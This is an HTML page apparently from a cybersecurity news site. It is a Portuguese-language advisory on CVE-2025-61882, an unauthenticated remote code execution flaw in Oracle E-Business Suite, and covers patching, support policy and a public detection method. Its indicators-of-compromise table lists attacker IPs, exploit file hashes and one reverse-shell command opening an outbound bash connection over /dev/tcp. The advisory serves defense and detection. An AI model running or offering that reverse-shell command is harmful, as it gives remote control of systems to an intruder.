Código HTML do Conteúdo

Post: Vulnerabilidade do Oracle E-Business Suite 9.8: Atualizações Urgentes Necessárias


<div> <div data-element_type="widget" data-id="914a4f5" data-widget_type="shortcode.default"> <div> <div> <p><span><b><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">Redazione RHC</a>:5 outubro 2025 21:29</b></span></p> <p>A Oracle publicou um comunicado de seguran&ccedil;a sobre uma vulnerabilidade cr&iacute;tica identificada como <strong><a href="https://www.redhotcyber.com/en/cve-details/?cve_id=CVE-2025-61882" target="_blank">CVE-2025-61882</a></strong> No <strong>Oracle E-Business Suite</strong> . A falha pode ser explorada <strong>remotamente sem autentica&ccedil;&atilde;o</strong> , potencialmente permitindo que c&oacute;digos maliciosos sejam executados em sistemas afetados.</p> <p>A empresa recomenda que seus clientes <strong>Aplique imediatamente as atualiza&ccedil;&otilde;es descritas</strong> no aviso. A Oracle enfatiza a import&acirc;ncia de <em>Manter <strong>Ativamente apoiado</strong> vers&otilde;es do produto e instalar todos os patches de seguran&ccedil;a cr&iacute;ticos imediatamente.</em> Em particular, atualizando patches cr&iacute;ticos lan&ccedil;ados em <strong>Outubro de 2023</strong> &eacute; um pr&eacute;-requisito para a implementa&ccedil;&atilde;o de novas corre&ccedil;&otilde;es.</p> <p>Para apoiar <strong>detec&ccedil;&atilde;o e conten&ccedil;&atilde;o imediatas</strong> de poss&iacute;veis ataques, o alerta inclui uma matriz de risco com <strong>Indicadores de comprometimento</strong> , como endere&ccedil;os IP suspeitos, comandos e arquivos associados a explora&ccedil;&otilde;es conhecidas.</p> <h2>Produtos afetados e patches dispon&iacute;veis</h2> <p>O <a href="https://www.oracle.com/security-alerts/alert-cve-2025-61882.html" target="_blank">A vulnerabilidade afeta especificamente</a> <strong>Oracle E-Business Suite vers&otilde;es 12.2.3 a 12.2.14</strong> . A documenta&ccedil;&atilde;o oficial, dispon&iacute;vel atrav&eacute;s dos links fornecidos pela Oracle, cont&eacute;m informa&ccedil;&otilde;es detalhadas sobre os patches e como instal&aacute;-los.</p> <h2>Suporte e vers&otilde;es legadas</h2> <p>Patches fornecidos por meio do <strong>Alerta de seguran&ccedil;a</strong> est&atilde;o dispon&iacute;veis apenas para vers&otilde;es cobertas por <strong>Suporte Premier</strong> ou <strong>Suporte estendido</strong> de acordo com a Pol&iacute;tica de Suporte Vital&iacute;cio da Oracle.</p> <p>As vers&otilde;es n&atilde;o inclu&iacute;das nesses programas n&atilde;o s&atilde;o testadas quanto a vulnerabilidades relatadas, mesmo que ainda possam ser afetadas. Por esse motivo, a Oracle recomenda <strong>Atualizando para vers&otilde;es suportadas</strong> para garantir prote&ccedil;&atilde;o e compatibilidade com patches de seguran&ccedil;a.</p> <h2>Como verificar se voc&ecirc; &eacute; afetado pelo bug</h2> <p><strong><a href="https://www.redhotcyber.com/en/cve-details/?cve_id=CVE-2025-61882" target="_blank">CVE-2025-61882</a></strong> Afeta <strong>Oracle E-Business Suite</strong> e &eacute; explor&aacute;vel remotamente sem autentica&ccedil;&atilde;o, resultando potencialmente na execu&ccedil;&atilde;o remota de c&oacute;digo se explorado com sucesso.</p> <p><a href="https://github.com/rxerium/CVE-2025-61882" target="_blank">Um m&eacute;todo de detec&ccedil;&atilde;o p&uacute;blico foi publicado em <strong>GitHub</strong></a> que ajuda a identificar inst&acirc;ncias potencialmente desatualizadas. O m&eacute;todo sinaliza uma inst&acirc;ncia como suspeita quando a p&aacute;gina retorna a cadeia de caracteres <strong>&ldquo;P&aacute;gina inicial do E-Business Suite&rdquo;</strong> e o HTTP <strong>&Uacute;ltima modifica&ccedil;&atilde;o</strong> relat&oacute;rios de cabe&ccedil;alho uma data anterior <strong>4 de outubro de 2025</strong> (Carimbo de data/hora do Unix <strong>1759602752</strong> ).</p> <p>Essa abordagem &eacute; <em>descrito como uma ferramenta de detec&ccedil;&atilde;o, n&atilde;o um vetor de ataque</em> &ndash; e deve ser usado apenas para fins de verifica&ccedil;&atilde;o e defesa. Para reduzir o risco, a Oracle recomenda aplicar os patches descritos no comunicado de seguran&ccedil;a e atualizar para as vers&otilde;es suportadas.</p> <h2>Indicadores de Comprometimento (IOC)</h2> <p>Abaixo est&atilde;o os indicadores de comprometimento (endere&ccedil;os IP, comandos observados e arquivos) para dar suporte &agrave; detec&ccedil;&atilde;o, investiga&ccedil;&atilde;o e conten&ccedil;&atilde;o imediatas.</p> <figure> <table> <thead> <tr> <th>Indicador</th> <th>Tipo</th> <th>Descri&ccedil;&atilde;o</th> </tr> </thead> <tbody> <tr> <td>200[.]107[.]207[.]26</td> <td>Propriedade intelectual</td> <td>Atividade potencial de GET e POST</td> </tr> <tr> <td>185[.]181[.]60[.]11</td> <td>Propriedade intelectual</td> <td>Atividade potencial de GET e POST</td> </tr> <tr> <td>sh -c /bin/bash -i &gt;&amp; /dev/tcp//0&gt;&amp;1</td> <td>Comando</td> <td>Estabelecer uma conex&atilde;o TCP de sa&iacute;da em uma porta espec&iacute;fica</td> </tr> <tr> <td>76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d</td> <td>SHA 256</td> <td>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip</td> </tr> <tr> <td>aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121</td> <td>SHA 256</td> <td>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py</td> </tr> <tr> <td>6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b</td> <td>SHA 256</td> <td>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py</td> </tr> </tbody> </table> </figure> <div> <div> <div> <div> <p><b><span>Reda&ccedil;&atilde;o</span></b><br /><span>A equipe editorial da Red Hot Cyber &eacute; composta por um grupo de indiv&iacute;duos e fontes an&ocirc;nimas que colaboram ativamente para fornecer informa&ccedil;&otilde;es e not&iacute;cias antecipadas sobre seguran&ccedil;a cibern&eacute;tica e computa&ccedil;&atilde;o em geral.</span></p> <p><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">Lista degli articoli</a></p> </div> </div> </div> </div> </div> </div> </div></div>